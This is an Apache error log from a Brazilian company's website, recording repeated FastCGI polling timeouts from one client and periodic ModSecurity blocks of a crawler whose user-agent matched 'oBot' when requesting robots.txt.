[Sun Mar 15 18:36:10.129779 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:50208] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:36:31.128490 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:50464] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:36:43.019833 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.244.31:53994] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcma9SswJuvopo3lOgUtwAAAJY"]
[Sun Mar 15 18:36:53.121805 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50636] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:37:14.106054 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:50826] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:37:36.069870 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:51110] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:37:57.122102 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:51424] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:38:15.570927 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.228.16:54152] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcmxwlT9VtDQc7bgUxDNwAAAQQ"]
[Sun Mar 15 18:38:19.037880 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:51600] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:38:40.125821 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:51800] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:39:01.137926 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52090] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:39:23.130296 2026] [proxy_fcgi:error] [pid 21805:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:52246] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:39:45.123941 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:52534] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:40:07.057917 2026] [proxy_fcgi:error] [pid 32654:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:52776] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:40:28.120236 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52986] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:40:50.126922 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:53190] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:41:11.123745 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:53454] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:41:32.136519 2026] [proxy_fcgi:error] [pid 21806:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:53708] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:41:46.991179 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.244.31:39468] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcnmtSswJuvopo3lOgVEAAAAIE"]
[Sun Mar 15 18:41:54.135984 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53892] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:42:16.685816 2026] [proxy_fcgi:error] [pid 32654:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:54174] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:42:38.121765 2026] [proxy_fcgi:error] [pid 32654:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:54326] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:42:59.021787 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:54672] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:43:20.137765 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54794] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:43:40.489445 2026] [:error] [pid 21946:tid 140411557287680] [client 74.7.228.16:35276] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcoDHbQATo66fKoS7z5JwAAANY"]
[Sun Mar 15 18:43:41.121843 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:54968] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:44:03.130743 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:55132] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:44:24.809392 2026] [proxy_fcgi:error] [pid 32654:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55332] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:44:46.701834 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55636] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:45:08.041886 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55808] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:45:29.129779 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56020] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:45:51.125287 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:56174] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:46:12.137788 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56332] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:46:33.124528 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:56444] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:46:54.081792 2026] [proxy_fcgi:error] [pid 21946:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:56698] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:47:13.109414 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.244.31:54474] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abco4dSswJuvopo3lOgVqQAAAIM"]
[Sun Mar 15 18:47:16.129792 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56918] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:47:38.033873 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:57212] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:48:00.129785 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:57486] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:48:21.041823 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:57704] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:48:43.070578 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57868] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:48:53.004936 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.228.16:41304] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcpRZqj1wV0Si-OkeeU9gAAAA4"]
[Sun Mar 15 18:49:05.141461 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58132] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:49:27.133873 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:58318] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:49:49.121842 2026] [proxy_fcgi:error] [pid 32654:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58530] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:50:11.097870 2026] [proxy_fcgi:error] [pid 21806:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58666] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:50:32.033891 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:58882] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:50:54.085861 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59100] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:51:15.041800 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59346] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:51:36.121783 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59474] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:51:58.125792 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:59736] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:52:13.493238 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.244.31:46128] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcqDZqj1wV0Si-OkeeVRQAAABE"]
[Sun Mar 15 18:52:19.131142 2026] [proxy_fcgi:error] [pid 32654:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59896] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:52:40.509891 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60184] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:53:03.133807 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:60372] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:53:24.127248 2026] [proxy_fcgi:error] [pid 32654:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60562] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:53:45.125875 2026] [proxy_fcgi:error] [pid 32654:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60716] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:54:06.065905 2026] [proxy_fcgi:error] [pid 32654:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:32776] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:54:13.003160 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.228.16:39988] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcqhZqj1wV0Si-OkeeVZwAAAAQ"]
[Sun Mar 15 18:54:27.133815 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:32912] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:54:49.065871 2026] [proxy_fcgi:error] [pid 32654:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:33142] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:55:11.131912 2026] [proxy_fcgi:error] [pid 32654:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:33380] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:55:33.125823 2026] [proxy_fcgi:error] [pid 21533:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33542] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:55:55.081807 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:33774] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:56:17.137814 2026] [proxy_fcgi:error] [pid 32654:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:34082] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:56:39.037809 2026] [proxy_fcgi:error] [pid 32654:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:34322] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:57:00.141986 2026] [proxy_fcgi:error] [pid 21946:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34528] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:57:21.129865 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:34758] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:57:49.137424 2026] [proxy_fcgi:error] [pid 32654:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:35020] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:58:10.037832 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35164] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:58:31.125804 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35364] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:58:53.129798 2026] [proxy_fcgi:error] [pid 21533:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:35658] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:59:14.130106 2026] [proxy_fcgi:error] [pid 32654:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:35910] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:59:19.529123 2026] [:error] [pid 21946:tid 140411540502272] [client 74.7.228.16:47010] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcrt3bQATo66fKoS7z6ZAAAANg"]
[Sun Mar 15 18:59:35.133817 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:36092] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 18:59:56.122262 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:36276] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:00:17.050059 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:36440] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:00:27.068468 2026] [mime_magic:error] [pid 32654:tid 140411658000128] (70014)End of file found: [client 66.249.74.169:54254] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Sun Mar 15 19:00:38.133788 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:36698] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:01:00.130521 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36908] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:01:21.125817 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:37044] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:01:43.102447 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:37314] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:02:05.120972 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37472] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:02:27.129826 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37692] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:02:48.120324 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:37998] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:03:10.121450 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38176] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:03:32.045878 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:38364] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:03:54.069827 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38548] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:03:56.951043 2026] [:error] [pid 21533:tid 140411548894976] [client 74.7.244.31:39040] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcszHjZBu2q05ozVU8FJwAAAVc"]
[Sun Mar 15 19:04:16.125936 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38746] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:04:37.125802 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:38896] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:04:46.600846 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.228.16:38992] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcs_njZBu2q05ozVU8FOgAAAU0"]
[Sun Mar 15 19:04:58.141407 2026] [proxy_fcgi:error] [pid 32654:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39102] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:05:19.130793 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39328] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:05:41.129783 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39506] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:06:03.122010 2026] [proxy_fcgi:error] [pid 32654:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:39764] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:06:25.113811 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:39966] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:06:46.129887 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:40144] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:07:07.131303 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40376] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:07:29.129861 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:40672] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:07:50.138858 2026] [proxy_fcgi:error] [pid 32654:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:40962] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:08:12.482784 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:41172] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:08:34.129785 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:41340] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:08:55.133998 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41692] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:08:58.346197 2026] [:error] [pid 21946:tid 140411716749056] [client 74.7.244.31:57256] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abct-nbQATo66fKoS7z7LgAAAMM"]
[Sun Mar 15 19:09:17.045803 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41868] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:09:38.057820 2026] [proxy_fcgi:error] [pid 32654:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:42086] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:09:49.950367 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.228.16:50946] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcuLXjZBu2q05ozVU8FnwAAAU0"]
[Sun Mar 15 19:09:59.113845 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42350] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:10:20.129892 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:42516] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:10:41.057811 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:42832] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:11:03.057836 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:43090] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:11:26.113985 2026] [proxy_fcgi:error] [pid 21806:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:43332] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:11:48.126542 2026] [proxy_fcgi:error] [pid 32654:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:43638] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:12:10.130108 2026] [proxy_fcgi:error] [pid 32654:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43886] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:12:31.125793 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:44122] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:12:53.126791 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44424] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:13:15.133850 2026] [proxy_fcgi:error] [pid 32654:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44716] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:13:36.121764 2026] [proxy_fcgi:error] [pid 21806:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:44988] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:13:57.129790 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45276] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:14:18.122766 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45560] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:14:21.815085 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.244.31:47408] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcvPXjZBu2q05ozVU8GKQAAAU0"]
[Sun Mar 15 19:14:40.125826 2026] [proxy_fcgi:error] [pid 32654:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45878] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:15:01.122654 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:46144] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:15:11.341156 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.228.16:32820] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcvbwlT9VtDQc7bgUxG6QAAARQ"]
[Sun Mar 15 19:15:22.121773 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46346] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:15:43.110457 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46530] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:16:04.127146 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:46858] AH01075: Error dispatching request to : (polling)
